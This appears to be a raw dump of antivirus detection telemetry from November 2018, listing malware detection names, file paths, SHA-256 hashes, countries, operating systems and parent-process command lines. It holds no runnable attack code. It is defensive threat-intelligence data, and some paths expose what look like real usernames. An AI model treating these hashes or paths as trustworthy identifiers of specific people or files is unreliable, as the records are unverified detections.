  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161643-1cb36274', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a12a2d7b\\AVSCAN-20181102-150957-346F774B\\AVSCAN-20181102-161643-1CB36274', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:19:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta-universv1.0.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\gta-universv1.0\\gta-universv1.0.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smappscontroller_update_0e0e3de8.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_19-53-49\\smappscontroller_update_0e0e3de8.exe', filesize=3584000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='44b78ecff8902fbea0bf64454d8be5d3491cf285aef15af4898fefe00eb4cef8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=303104, timestamp='2018-11-02T16:54:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-232524-1fb0b6c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9d377eb\\AVSCAN-20181102-232247-109E1FB5\\AVSCAN-20181102-232524-1FB0B6C4', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:27:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050309-8fc2ec8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050309-8FC2EC8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pwbpnnaq.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\pwBpnNAQ.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153449-d37c968c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153449-D37C968C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:37:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4e456b0aaaf15232bd7f8a8ae8ffbb0c95469d4c9df4c8be6c7a6c2decef4990', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4E456B0AAAF15232BD7F8A8AE8FFBB0C95469D4C9DF4C8BE6C7A6C2DECEF4990', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4e456b0aaaf15232bd7f8a8ae8ffbb0c95469d4c9df4c8be6c7a6c2decef4990', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:10:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050357-ac688ebf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050357-AC688EBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mp3.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\MP3\\MP3.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='73c18cbaed5b72e91c293bb70286ab85930974b6506bb75dd1c85b9728e9d665', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:15:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061437-8bda6e8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061437-8BDA6E8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000075d3', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000075d3', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:50:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='igyohcyi.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\IgYOHCyI.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161141-6e656e7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-161141-6E656E7F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:14:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135306-657071cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-135306-657071CD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:56:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-202613-2143c34b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_19956ce6\\AVSCAN-20181101-202340-114FC2A3\\AVSCAN-20181101-202613-2143C34B', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:26:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052815-1183dbd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052815-1183DBD2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6e25682360f1f77cb50019762a80676835dc64b95c7e676665243a773bdedc56', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6E25682360F1F77CB50019762A80676835DC64B95C7E676665243A773BDEDC56', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6e25682360f1f77cb50019762a80676835dc64b95c7e676665243a773bdedc56', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:21:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125652-f287fc1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125652-F287FC1A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:59:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered madac', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered madac', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='549d113b10b31a1e5c978050b4e942989cac84e9d281c123accb6cfb1f3bff9a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:49:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055622-fed84914', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055622-FED84914', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055204-6571d98c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055204-6571D98C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052219-3d907cab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052219-3D907CAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054924-05bf00c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054924-05BF00C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054749-cd0159c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054749-CD0159C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052615-ca3c55ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052615-CA3C55CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055115-48336d5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055115-48336D5B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062639-3a5935b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062639-3A5935B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051623-695c7d05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051623-695C7D05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053221-a462845e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053221-A462845E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061129-1b6bdcb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061129-1B6BDCB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062014-547e1697', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062014-547E1697', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060448-2c854af7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060448-2C854AF7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061809-09faae91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061809-09FAAE91', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062511-058709b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062511-058709B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055022-28a9e7a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055022-28A9E7A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053624-3549b26b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053624-3549B26B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053527-12f82fec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053527-12F82FEC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060227-d8d4b62a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060227-D8D4B62A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052940-442a4573', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052940-442A4573', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055034-2f8ef781', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055034-2F8EF781', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061830-1697d2ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061830-1697D2CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050916-6a6f28b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050916-6A6F28B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:14Z'), dt=datetime.date(2018, 11, 2)),
